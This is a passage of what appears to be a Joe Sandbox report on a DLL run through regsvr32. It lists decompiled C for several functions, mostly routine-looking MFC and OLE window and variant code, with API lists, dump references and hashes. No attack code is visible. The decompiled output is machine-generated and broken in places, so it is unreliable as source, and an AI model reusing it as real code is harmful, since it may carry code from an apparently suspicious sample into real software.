						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x100a4a1c);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x100a47bc, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}














                                                                                                                0x1003275c
                                                                                                                0x1003275c
                                                                                                                0x10032763
                                                                                                                0x10032768
                                                                                                                0x1003276f
                                                                                                                0x10032776
                                                                                                                0x10032779
                                                                                                                0x1003277c
                                                                                                                0x100328e2
                                                                                                                0x100328e2
                                                                                                                0x100328ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10032782
                                                                                                                0x10032782
                                                                                                                0x10032788
                                                                                                                0x1003278b
                                                                                                                0x10032791
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10032797
                                                                                                                0x1003279c
                                                                                                                0x1003279f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100327ab
                                                                                                                0x100327ae
                                                                                                                0x100327be
                                                                                                                0x100327c8
                                                                                                                0x100327cf
                                                                                                                0x100327d4
                                                                                                                0x100327db
                                                                                                                0x100327e0
                                                                                                                0x100327e4
                                                                                                                0x100327e8
                                                                                                                0x1003281d
                                                                                                                0x1003281d
                                                                                                                0x100327ea
                                                                                                                0x100327f5
                                                                                                                0x100327fe
                                                                                                                0x10032802
                                                                                                                0x1003280b
                                                                                                                0x1003280f
                                                                                                                0x10032815
                                                                                                                0x10032815
                                                                                                                0x10032820
                                                                                                                0x10032826
                                                                                                                0x1003282c
                                                                                                                0x1003282f
                                                                                                                0x10032832
                                                                                                                0x10032838
                                                                                                                0x1003283d
                                                                                                                0x10032841
                                                                                                                0x10032844
                                                                                                                0x10032845
                                                                                                                0x1003284a
                                                                                                                0x1003284f
                                                                                                                0x10032851
                                                                                                                0x10032860
                                                                                                                0x10032874
                                                                                                                0x10032877
                                                                                                                0x1003287d
                                                                                                                0x10032880
                                                                                                                0x1003288b
                                                                                                                0x10032890
                                                                                                                0x10032890
                                                                                                                0x1003289a
                                                                                                                0x1003289f
                                                                                                                0x1003289f
                                                                                                                0x100328a9
                                                                                                                0x100328ae
                                                                                                                0x100328ae
                                                                                                                0x100328b4
                                                                                                                0x100328b7
                                                                                                                0x100328b7
                                                                                                                0x1003284f
                                                                                                                0x100328bb
                                                                                                                0x100328c3
                                                                                                                0x100328c9
                                                                                                                0x100328d3
                                                                                                                0x100328d3
                                                                                                                0x100328d9
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10032763
                                                                                                                • _memset.LIBCMT ref: 100327CF
                                                                                                                  • Part of subcall function 100235FF: _memset.LIBCMT ref: 10023607
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1003280F
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10032890
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1003289F
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 100328AE
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 100328C3
                                                                                                                  • Part of subcall function 10032245: __EH_prolog3.LIBCMT ref: 10032261
                                                                                                                  • Part of subcall function 10032245: VariantClear.OLEAUT32(?), ref: 100322C6
                                                                                                                  • Part of subcall function 100235DF: VariantCopy.OLEAUT32(00000000,00000000), ref: 100235ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2905758408-0
                                                                                                                • Opcode ID: d9832d25b98ae345620f190acc055fd0960a654323a07aa8102f2343d52582eb
                                                                                                                • Instruction ID: 71e90c444253352b4aa8153b2470761f7329699f876c3cffb1f3a0a95f4ec303
                                                                                                                • Opcode Fuzzy Hash: d9832d25b98ae345620f190acc055fd0960a654323a07aa8102f2343d52582eb
                                                                                                                • Instruction Fuzzy Hash: 6A51E271D00209EFEB51CFA4C985BEEBBB8FF08305F204569E516EB291DB74A945CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002F23F Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E1002F23F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1004764D(0x100904c6, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1001E397(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1001D714();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E10047725(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x100a4a1c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10049170(_t97, _t101 - 0x48, 0, 0x20);
						E10049170(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x100a47bc, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E1000A069(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E1002C9FF(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1001D714();
				}
				_t59 = _t98;
				goto L22;
			}
















                                                                                                                0x1002f23f
                                                                                                                0x1002f23f
                                                                                                                0x1002f246
                                                                                                                0x1002f254
                                                                                                                0x1002f25d
                                                                                                                0x1002f26a
                                                                                                                0x1002f26d
                                                                                                                0x1002f394
                                                                                                                0x1002f394
                                                                                                                0x1002f398
                                                                                                                0x1002f39b
                                                                                                                0x1002f39d
                                                                                                                0x1002f3a0
                                                                                                                0x1002f3a1
                                                                                                                0x1002f3a1
                                                                                                                0x1002f3a6
                                                                                                                0x1002f3a6
                                                                                                                0x1002f3a8
                                                                                                                0x1002f3ad
                                                                                                                0x1002f3ad
                                                                                                                0x1002f279
                                                                                                                0x1002f2c6
                                                                                                                0x1002f2c9
                                                                                                                0x1002f2cf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002f2d5
                                                                                                                0x1002f2dc
                                                                                                                0x1002f2e2
                                                                                                                0x1002f2e7
                                                                                                                0x1002f2e9
                                                                                                                0x1002f2ec
                                                                                                                0x1002f2ef
                                                                                                                0x1002f2f1
                                                                                                                0x1002f2f8
                                                                                                                0x1002f304
                                                                                                                0x1002f306
                                                                                                                0x1002f308
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002f315
                                                                                                                0x1002f321
                                                                                                                0x1002f326
                                                                                                                0x1002f32b
                                                                                                                0x1002f32e
                                                                                                                0x1002f330
                                                                                                                0x1002f333
                                                                                                                0x1002f335
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002f352
                                                                                                                0x1002f355
                                                                                                                0x1002f358
                                                                                                                0x1002f35e
                                                                                                                0x1002f361
                                                                                                                0x1002f366
                                                                                                                0x1002f366
                                                                                                                0x1002f368
                                                                                                                0x1002f36b
                                                                                                                0x1002f370
                                                                                                                0x1002f370
                                                                                                                0x1002f372
                                                                                                                0x1002f375
                                                                                                                0x1002f37a
                                                                                                                0x1002f37a
                                                                                                                0x1002f37c
                                                                                                                0x1002f382
                                                                                                                0x1002f385
                                                                                                                0x1002f388
                                                                                                                0x1002f38a
                                                                                                                0x1002f38a
                                                                                                                0x00000000
                                                                                                                0x1002f388
                                                                                                                0x1002f2f3
                                                                                                                0x1002f2f3
                                                                                                                0x00000000
                                                                                                                0x1002f2f3
                                                                                                                0x1002f27e
                                                                                                                0x1002f287
                                                                                                                0x1002f28e
                                                                                                                0x1002f291
                                                                                                                0x1002f294
                                                                                                                0x1002f297
                                                                                                                0x1002f29a
                                                                                                                0x1002f29d
                                                                                                                0x1002f2a0
                                                                                                                0x1002f2a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002f2aa
                                                                                                                0x1002f2b1
                                                                                                                0x1002f2b4
                                                                                                                0x1002f2b6
                                                                                                                0x1002f2b9
                                                                                                                0x1002f2ba
                                                                                                                0x1002f2ba
                                                                                                                0x1002f2bf
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 3574576181-0
                                                                                                                • Opcode ID: 0c5c79690934b08080de730fa962a6b528dd591dd951afd2560f228c1dd8ac82
                                                                                                                • Instruction ID: 03b1f9187570ac732a2ad0fd53828fbe430a56604cb9a184f68fd8707445ec45
                                                                                                                • Opcode Fuzzy Hash: 0c5c79690934b08080de730fa962a6b528dd591dd951afd2560f228c1dd8ac82
                                                                                                                • Instruction Fuzzy Hash: 92413975901219EFCB01DFA4C8459EEBBB9FF45B90F50822AF019AA151C770AA81CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013B72 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10013B72(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100177F8(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E10019F1B(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1001A4C2(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1001793D(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1001A352(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1001935C();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1001793D(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}






















                                                                                                                0x10013b72
                                                                                                                0x10013b7b
                                                                                                                0x10013b83
                                                                                                                0x10013b85
                                                                                                                0x10013b89
                                                                                                                0x10013b8d
                                                                                                                0x10013b9b
                                                                                                                0x10013b9b
                                                                                                                0x10013ba0
                                                                                                                0x10013ba6
                                                                                                                0x10013baa
                                                                                                                0x10013bae
                                                                                                                0x10013bb3
                                                                                                                0x10013bb9
                                                                                                                0x10013c31
                                                                                                                0x10013c31
                                                                                                                0x10013c31
                                                                                                                0x10013c35
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10013bcd
                                                                                                                0x10013bcf
                                                                                                                0x10013c37
                                                                                                                0x10013c37
                                                                                                                0x10013c37
                                                                                                                0x10013c3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10013c42
                                                                                                                0x10013c48
                                                                                                                0x10013c50
                                                                                                                0x10013c5d
                                                                                                                0x10013c65
                                                                                                                0x10013c67
                                                                                                                0x10013c67
                                                                                                                0x10013c50
                                                                                                                0x10013c6b
                                                                                                                0x10013c6d
                                                                                                                0x10013c73
                                                                                                                0x10013c75
                                                                                                                0x10013cb0
                                                                                                                0x10013cb0
                                                                                                                0x10013cb0
                                                                                                                0x00000000
                                                                                                                0x10013c77
                                                                                                                0x10013c7b
                                                                                                                0x10013c82
                                                                                                                0x10013c83
                                                                                                                0x10013c85
                                                                                                                0x10013c8d
                                                                                                                0x10013c8d
                                                                                                                0x10013ca1
                                                                                                                0x00000000
                                                                                                                0x10013ca3
                                                                                                                0x00000000
                                                                                                                0x10013ca3
                                                                                                                0x10013ca1
                                                                                                                0x10013c75
                                                                                                                0x10013ca5
                                                                                                                0x10013ca6
                                                                                                                0x00000000
                                                                                                                0x10013cab
                                                                                                                0x10013bd1
                                                                                                                0x10013bd3
                                                                                                                0x10013bd7
                                                                                                                0x10013bd9
                                                                                                                0x10013be1
                                                                                                                0x10013be3
                                                                                                                0x10013be3
                                                                                                                0x10013be3
                                                                                                                0x10013be5
                                                                                                                0x10013bea
                                                                                                                0x10013bec
                                                                                                                0x10013bf0
                                                                                                                0x10013bf2
                                                                                                                0x10013bf6
                                                                                                                0x10013c05
                                                                                                                0x10013c05
                                                                                                                0x10013bf6
                                                                                                                0x10013bf0
                                                                                                                0x10013c0b
                                                                                                                0x10013c10
                                                                                                                0x10013c2d
                                                                                                                0x10013c2d
                                                                                                                0x00000000
                                                                                                                0x10013c12
                                                                                                                0x10013c1f
                                                                                                                0x10013c25
                                                                                                                0x10013c29
                                                                                                                0x10013c2b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10013c2b
                                                                                                                0x10013c10
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000004), ref: 10013BA0
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10013BC7
                                                                                                                • UpdateWindow.USER32 ref: 10013BE1
                                                                                                                • SendMessageA.USER32 ref: 10013C05
                                                                                                                • SendMessageA.USER32 ref: 10013C1F
                                                                                                                • UpdateWindow.USER32 ref: 10013C65
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10013C99
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2853195852-0
                                                                                                                • Opcode ID: c3e276bd65efa7df5bba1a0d96a9bb273c94ca5dcf2f5af77d8346f14572e0c2
                                                                                                                • Instruction ID: bcd71ec54be47078b87aecd0e4f52c04ce37c12de65d41b37e9f73b1c2401c47
                                                                                                                • Opcode Fuzzy Hash: c3e276bd65efa7df5bba1a0d96a9bb273c94ca5dcf2f5af77d8346f14572e0c2
                                                                                                                • Instruction Fuzzy Hash: 1A41C0306047819BD711CF258988E5BBBF4FFC5B84F00892CF492A9061D772D884CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10019E81 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10019E81(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10012730();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1001E302(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E100158CD(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E100158CD(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10015912(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E100158CD(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x100b8618;
						L10048E48( &_v28, 0x100aff30);
						asm("int3");
						_push(4);
						E1004764D(0x1008dd26, _t37, _t46, _t51);
						_t43 = E10020454(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1001DB72(_t43);
						}
						return E10047725(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}
























                                                                                                                0x10019e81
                                                                                                                0x10019e81
                                                                                                                0x10019e81
                                                                                                                0x10019e86
                                                                                                                0x10019ea1
                                                                                                                0x10019ea3
                                                                                                                0x10019ea5
                                                                                                                0x10019eb0
                                                                                                                0x10019eb6
                                                                                                                0x10019eb8
                                                                                                                0x10019eba
                                                                                                                0x10019ebb
                                                                                                                0x10026f0a
                                                                                                                0x10026f0c
                                                                                                                0x10026f0f
                                                                                                                0x10026f11
                                                                                                                0x10026f33
                                                                                                                0x00000000
                                                                                                                0x10026f13
                                                                                                                0x10026f13
                                                                                                                0x10026f18
                                                                                                                0x10026f1a
                                                                                                                0x10026f2b
                                                                                                                0x10026f2b
                                                                                                                0x10026f32
                                                                                                                0x10026f32
                                                                                                                0x10019ebd
                                                                                                                0x10026e6b
                                                                                                                0x10026e6b
                                                                                                                0x10026e6c
                                                                                                                0x10026e6d
                                                                                                                0x10026e6e
                                                                                                                0x10026e6f
                                                                                                                0x10026e70
                                                                                                                0x10026e74
                                                                                                                0x10026e7a
                                                                                                                0x10026e80
                                                                                                                0x10026e99
                                                                                                                0x10026e99
                                                                                                                0x10026e9b
                                                                                                                0x10026e9d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10026e8d
                                                                                                                0x10026e8f
                                                                                                                0x10026e91
                                                                                                                0x10026f03
                                                                                                                0x10026f08
                                                                                                                0x10026e93
                                                                                                                0x10026e94
